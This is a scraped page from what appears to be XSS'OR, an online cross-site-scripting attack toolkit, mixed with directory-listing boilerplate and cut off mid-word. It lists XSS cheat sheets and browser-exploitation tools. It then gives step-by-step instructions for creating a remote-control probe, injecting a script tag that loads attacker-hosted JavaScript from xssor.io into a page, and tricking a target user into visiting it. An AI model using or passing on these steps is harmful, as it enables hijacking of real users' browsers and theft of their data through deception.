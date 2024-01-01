XSS'OR 0 ( 0 ) Report Issue Reason Select a reason Deprecated Incorrect information Claim this listing Other Details Close Submit Visit Website

VECTOR CODZ CODZ DESC AUTHOR UPDATE XSSMisc A XSS fuzzing misc. evilcos 2017/-- BXFBypass Browser's XSS Filter Bypass Cheat Sheet. Masato 2017/-- RSnakeXSS Classical XSS Filter Evasion Cheat Sheet. RSnake 2017/02 HTML5Sec More than HTML5 Security Cheatsheet. .mario 2017/01 PAYLOAD CODZ CODZ DESC AUTHOR UPDATE BeEF Browser Exploitation Framework Project. BeEF 2017/-- ExtProbe Chrome installed extensions/plugins. evi1m0 2017/01 CORSBOT IAMANEWBOTNAMEDCORSBOT. evilcos 2017/01 XSSProbe A small but classical XSS probe. evilcos 2014/01 xss.swf A tiny tool for Flash hacking. evilcos 2013/03 AttackAPI JavaScript AttackAPI from GNUCITIZEN. pdp 2007/01 REMOTE CONTROL Create Probe INPUT:wwavrjpTO .js CREATE AN ONE-TIME PROBE DO NOT BE BAD. One-time probe means you can just only use one time per day. HELP WARNING!! DO NOT BE BAD. This Probe, you can just only use one time per day. This Probe, just only the most basic Probe:) 1ST STAGE 1. Create Probe. 2. Inject "PROBE LINK" to a HTML page, eg: <script/src="http://xssor.io/probe/wuvwuup.js"></script> !!!Replace src value to your PROBE LINK!!! 3. Cheat target user access this HTML page. 4. Wait for target user online... 2ND STAGE *. The "RESULT LINK" is targe